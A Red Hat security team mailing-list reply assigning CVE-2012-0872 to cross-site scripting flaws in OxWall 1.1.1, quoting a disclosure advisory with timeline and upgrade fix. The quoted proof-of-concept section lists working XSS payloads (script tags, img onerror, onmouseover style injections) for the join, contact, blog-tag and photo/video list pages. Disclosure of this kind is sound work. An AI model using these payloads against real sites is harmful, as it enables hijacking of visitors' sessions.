Re: OxWall 1.1.1 <= Multiple Cross Site Scripting Vulnerabilities

[Kurt Seifried <kseifried () redhat com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 02/20/2012 09:53 AM, YGN Ethical Hacker Group wrote:
> 1. OVERVIEW
>
> OxWall 1.1.1 and lower versions are vulnerable to Cross Site Scripting.
>
>
> 2. BACKGROUND
>
> Oxwall is a free open source software package for building social
> networks, family sites and collaboration systems. It is a flexible
> community website engine developed with the aim to provide people with
> a well-coded, user-friendly software platform for social needs. It is
> easy to set up, configure and manage Oxwall while you focus on your
> site idea. We are testing the concept of free open source community
> software for complete (site,sub-site setups) and partial
> (widgets,features) community and collaboration solutions for companies
> and individuals.
>
>
> 3. VULNERABILITY DESCRIPTION
>
> Multiple parameters were not properly sanitized, which allows attacker
> to conduct Cross Site Scripting attack. This may allow an attacker to
> create a specially crafted URL that would execute arbitrary script
> code in a victim's browser.
>
>
> 4. VERSIONS AFFECTED
>
> 1.1.1 and lower
>
>
> 5. PROOF-OF-CONCEPT/EXPLOIT
>
> URL: http://localhost/Oxwall/join
>
> Injected Attack String: '"><script>alert(/XSS/)</script>
> Method: HTTP POST
> Vulnerable Parameters: captchaField, email, form_name  ,password
> ,realname  ,repeatPassword ,username
>
> ------------------------------------------------------------------------------------
>
> URL: http://localhost/Oxwall/contact
>
> Injected Attack String: '"><script>alert(/XSS/)</script>
> Method: HTTP POST
> Vulnerable Parameters: captcha, email, form_name  ,from , subject
> ------------------------------------------------------------------------------------
>
> URL: http://localhost/Oxwall/blogs/browse-by-tag?tag=%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
> Vulnerable Parameter: tag
>
> ----------------------------------------------------------------------------
>
> Vulnerable Parameter: RAW-URI
>
> http://localhost/Oxwall/photo/viewlist/tagged/><img src=xs onerror=alert('XSS')>
>
> http://localhost/Oxwall/photo/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=
>
> http://localhost/Oxwall/video/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=
>
>
> 6. SOLUTION
>
> Upgade to the latest version of Oxwall.
>
>
> 7. VENDOR
>
> Oxwall Foundation
> http://www.oxwall.org/
>
>
> 8. CREDIT
>
> Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
>
>
> 9. DISCLOSURE TIME-LINE
>
> 2011-06-09: notified vendor
> 2012-02-20: vulnerability disclosed
>
>
> 10. REFERENCES
>
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/%5BOxWall_1.1.1%5D_xss
> Oxwall Home Page: http://www.oxwall.org/
>
>
> #yehg [2012-02-20]

Please use CVE-2012-0872 for these XSS issues.

- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJPQtHCAAoJEBYNRVNeJnmTiKoP/A9I5fFvOOi9SFbkHWQPTWu/
ID9i4VEPeH+YyGITSjx2J0nC4IaSr30DMemc4XjQqpRUz15KjmQYXapS+hDJXa7f
9XpzUERrQPaghyIJG1X81pj2ONmS9euT31SNtH7iMt+4QD6K7ZOkOFFMSD0ViJS4
+4CrCIyQ26wrmcaZ164JT6WeJNFzmZk1Fp6QMoyclMvQh0pzaN2I7fVb8lUQXI7C
V9T3BIfpPVqoVrX69Ki5ojULLJL/EJhXKaAewUwfHsrX/KikFLq530/6x7+wjGXN
+/GauH/IO4BB7XytY57sbILcfDwWKJycLbg8D+M/9QO+cp047HQD8AFHDAkTLjCL
N2+9ckRyr3z4a5Ou9/Vfa6Fpg50RJ752ErDMOF2GQ4enkf7+LZuHmHmsVKEVUJWI
TfxpaTyYLiUTnVPcazz8mqEXSuFw8gkdBGvjQpD3vTlVCNjfPZY3naqC2aWGOu2b
VHnIbF/TDoi3oV/7Tu68pFcKeoopVEs3ENmdJagM4qINgs7xw3XtDJuICS1a8A70
DJIsbHeASbbvtpEk0X69WzbC6QJuufhHImEAohfrhww8tZ+lqFkE0esaRBEGNGe2
Hl4sXVCL9UgiGbXYO+VNohpnGAf+eWRL/fhLoBnU906sUkllXTDAfqBv6Ehey8u8
dGs82XRcilij2gX4LabZ
=Sh3G
-----END PGP SIGNATURE-----